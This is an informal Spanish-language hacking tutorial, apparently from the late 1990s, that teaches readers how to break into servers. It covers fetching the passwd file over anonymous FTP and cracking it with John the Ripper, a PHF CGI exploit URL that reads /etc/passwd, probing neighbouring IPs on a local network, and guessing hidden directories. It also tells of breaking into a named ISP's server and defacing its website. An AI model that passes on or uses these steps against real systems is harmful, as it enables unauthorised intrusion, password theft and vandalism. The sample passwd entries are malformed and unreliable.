Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo.
No voy a explicar todas las técnicas que se pueden usar para conseguirlo.
Las técnicas son infinitas. Por cada agujero posible en un sistema, hay una técnica. Solo
es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamos
a “visitar”. Debemos buscar todos los posibles accesos al sistema… (telnet, ftp, etc…)

COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTP

Ok, bien… Una de las formas más facil de conseguir ser “superusuario” en el sistema es
accediendo a traves de ftp anónimoal fichero “passwd”. Primero necesitas conocer algo sobre
los ficheros password:

root:User:g36Dfr:1j2YF6:1256:20:Superuser
Camilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/csh
BlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/csh

Este es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da
el root. Es la parte que nos interesa.

root:*:0:1:Misericordios:/:/bin/sh
ftp:*:202:102:Anonymous FTP:/U1/ftp
ftpadmin:*:203:102:ftp Administrator:/u1/ftp

Este es otro ejemplo de un fichero password, solo que este tiene una pequeña diferencia
este está controlado. Los password controlados no te dejan ver o copiar el actual password
encriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica).
Losiguiente es otro ejemplo de otro password controlado:

root:*:0:1:0000-Admin(0000):7:/usr/bin/csh
daemon:*:1:1:0000-Admin(0000):/:
bin:*:2:2:0000-Admin(0000):/usr/bin:

etc…
los password controlados tienen un “*” o “x” en el lugar donde va el password.
Ahora que tu conoces un poco más acerca de como identificar un password encriptado de un
password controlado, podemos hablar de como crackearlo.

Cracker un password no es tan complicado como parece. Los archivos varían de sistema a sistema.
Debemos antes que nada, de hacernos con el fichero passwd.
Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un
diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper,
brute force cracker…. Los puedes encontrar en cualquier página de hacking, incluido la mía.
http://www.redestb.es/personal/lcd
Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para
buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas
las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de
caracteres “raros”. Lo normal es que tenga predefinido miles de palabras posibles.
Si este método no funciona se hace un rastreo completo, probando todas las combinaciones
posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el
problema está en que tarda mucho. Una vez tengas el password, YA ESTA!!!
tendrás acceso a todo el sistema.

TECNICA PHF

la tecnica del phf es una de la más vieja (y que menos suele funcionar,tambien hay que decirlo)
de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede…)
ya que no cuesta nada y aveces se encuentra a alguna víctima que cae.
Todo lo que debes hacer es abrir tu “notescapes navegando” y escribir lo siguiente:

http://www.web_a_hackear.es/cgi-bin/phf?Qa…t%20/etc/passwd

reemplaza www.web_a_hackear.es por el dominio.
y ya está!. acontinuación se empezará a transmitir una linda copia del fichero con
los password (si funciona, claro está.

REDES LOCALES

Otro sistema es buscar la direccion IP del dominio a hackear. Todas las máquinas conectadas
a la red tienen una dirección IP. por ejemplo:
www.probando.com
debemos averiguar el IP de este servidor. (no me jodas con que no sabes como).
hay miles, no, millones de programitas que te lo dicen.
(hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice)
suponiendo que fuese:
194.179.23.100
esto es la dirección IP de la máquina central. Tal vez inaccesible, pero si tiene una red local
conectada a esta.. (ordenador del diseñador, del director… que se yo!)
las máquinas de la red tendrán un IP muy parecido. Sabes lo que puede pasar si en tu
navegador escribes lo siguiente?:
194.179.23.101 o 194.179.23.102 … etc…
que accederás a los ordenadores que estén en esa red local (siempre y cuando sean tan capullos
de no protegerlos porque no están cara al público!)
curioso ¿no?

DIRECTORIOS OCULTOS

Este método aunque parezca una chorrada… te juro que no lo es.
Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker….

…a ver… voy a hackear un servidor de Internet…
este esta bien. Son novatos. Mucho mejor, seguro que tendrán
un huevo de fallos. ¿Tendrán ftp anonimo?
Login: anonymous
passworD: anonymous
yeah! hay ftp anónimo con programitas shareware jeje….
mmmm… no está el directorio etc/ ….
vamos a ver si deja cambiar de directorio. igual está oculto.
-chg directory
cambiar a /etc
no existe. igual lo tienen protegido.
cambiar a /administrador
no existe.
cambiar a /administrator
SI EXISTE… hehehe
que hay en este directorio… etc/ bin/ mail/ (joder!) etc…..
joder! si están las páginas web aqui!
y el correo electrónico y todo!
ah!. Soy un hacker no un criminal.

A pesar de poder abrirse cuenta de acceso a internet, leer correos electrónicos
etc… solo cambió la página web.

el servidor en cuestión es conexión global internet (http://www.cglobal.com)
aunque el nombre cambió durante un día por “conexión mamadón internet”
hehehe… ya no tienen ftp anonimo. (mira a ver). es que los hay capullos.
Por probar que no quede. A probar todo lo que se te ocurra.
Si el servidor es de WinNT mejor que mejor! más rápido caerá.
probar con directorios ocultos tipo:
/root
/pub
/bin
/etc
/administrador
/administrator
/lo que se te ocurra.

Hay otros métodos, los más eficaces (y más complicados) por Telnet, etc.